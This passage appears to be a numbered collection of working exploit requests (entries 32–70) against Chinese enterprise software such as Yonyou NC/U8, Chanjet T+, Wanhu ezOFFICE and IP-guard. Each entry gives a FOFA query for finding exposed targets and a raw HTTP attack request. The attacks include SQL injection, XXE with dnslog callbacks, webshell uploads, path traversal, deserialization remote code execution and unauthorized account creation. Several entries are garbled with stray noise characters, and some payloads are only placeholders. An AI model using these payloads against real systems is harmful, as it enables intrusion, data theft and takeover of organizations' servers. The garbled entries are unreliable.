version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo endpoint SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud 政府财务云 任意文件读取" U" K, i, H3 E1 P: e4 [% r  v
FOFA:body="/pf/portal/login/css/fonts/style.css"
6 X/ p% [8 C7 f& o2 gGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1# Q; h7 U+ b# a8 K: v/ `
Host: x.x.x.x
% V) Y. b, L4 oCache-Control: max-age=0+ ~8 H, |5 P3 a: r% v3 k2 \& [, s. z
Upgrade-Insecure-Requests: 1
/ a' f8 \  T3 y: F- l9 j/ [% XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.366 f) a7 _- P% B( P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: X+ k' _9 Q2 H2 d& UAccept-Encoding: gzip, deflate, br
$ Q* U# ?! Z( Z7 Z9 L, B  x- B8 xAccept-Language: zh-CN,zh;q=0.9) v3 r/ l+ j0 \( |6 s( a
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT- I4 d2 \  Y5 r, z0 ^) M5 _
Connection: close
% q- I2 x' K' ^' y9 G
! h  v7 C! K, o" W. _  Z5 T
  ^4 X9 {  r% S* S7 ]  @. W" G9 {
48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Social Business ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; the command it carries writes the given string to the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
 "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
 "MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
    "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: request the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the endpoint
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
       "StartInfo": {
          "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
          "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行* N6 x# k2 o3 Q& N4 R( C! k
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"& h4 [' H$ a. C" o0 c
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
3 H' d8 I& d# X' k& L3 t  C4 jHost: 192.168.86.128:9090
0 i9 G: P, H6 tUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
3 ~$ o+ @2 E8 M4 W" X) q; s3 j" [/ HConnection: close& M( |9 O8 v* c0 `
Content-Length: 1669
. p; T  r3 g) h: n" O. xAccept: */*' X" H; f  z5 d. q4 S8 v2 f: ~  K' k
Accept-Language: en
( x, o7 Y3 Y3 j8 e0 m8 [$ K6 JContent-Type: application/x-www-form-urlencoded
+ k" g' e& D: m7 C6 p% T# @# RAccept-Encoding: gzip& f& \3 n' q7 a, {, d
* B7 X/ M6 |- l+ b3 |
PAYLOAD! p: K* Y3 }3 }+ s
; c8 L9 [7 E" M! Y4 V) r- Q. T5 q* q
% f) N2 v, X$ m7 v+ J, C3 h/ v" j
60. 百卓Smart管理平台 importexport.php SQL注入: j4 O  P+ h" c$ G
FOFA:title="Smart管理平台"3 Q# d" t; V$ w  v% C( I6 L  V; A
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% h6 f; c2 n/ `. Z8 h1 }Host:
' L3 H$ |8 A: k' |) jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
  L7 y( d7 w- T: _8 C* }' a3 s( wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# M' p& j5 M' u9 c8 u3 FAccept-Encoding: gzip, deflate
: W& U9 Y/ j% v; eAccept-Language: zh-CN,zh;q=0.9
6 S; Z! p% b0 T- {; c7 bConnection: close
; c  U6 B3 N! J5 M6 }, d  k( p/ Z6 I% y4 W

61. 浙大恩特客户资源管理系统 fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa


62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A


64. 捷诚管理信息系统 CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 privilege bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file to write, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp


68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


69. 万户ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
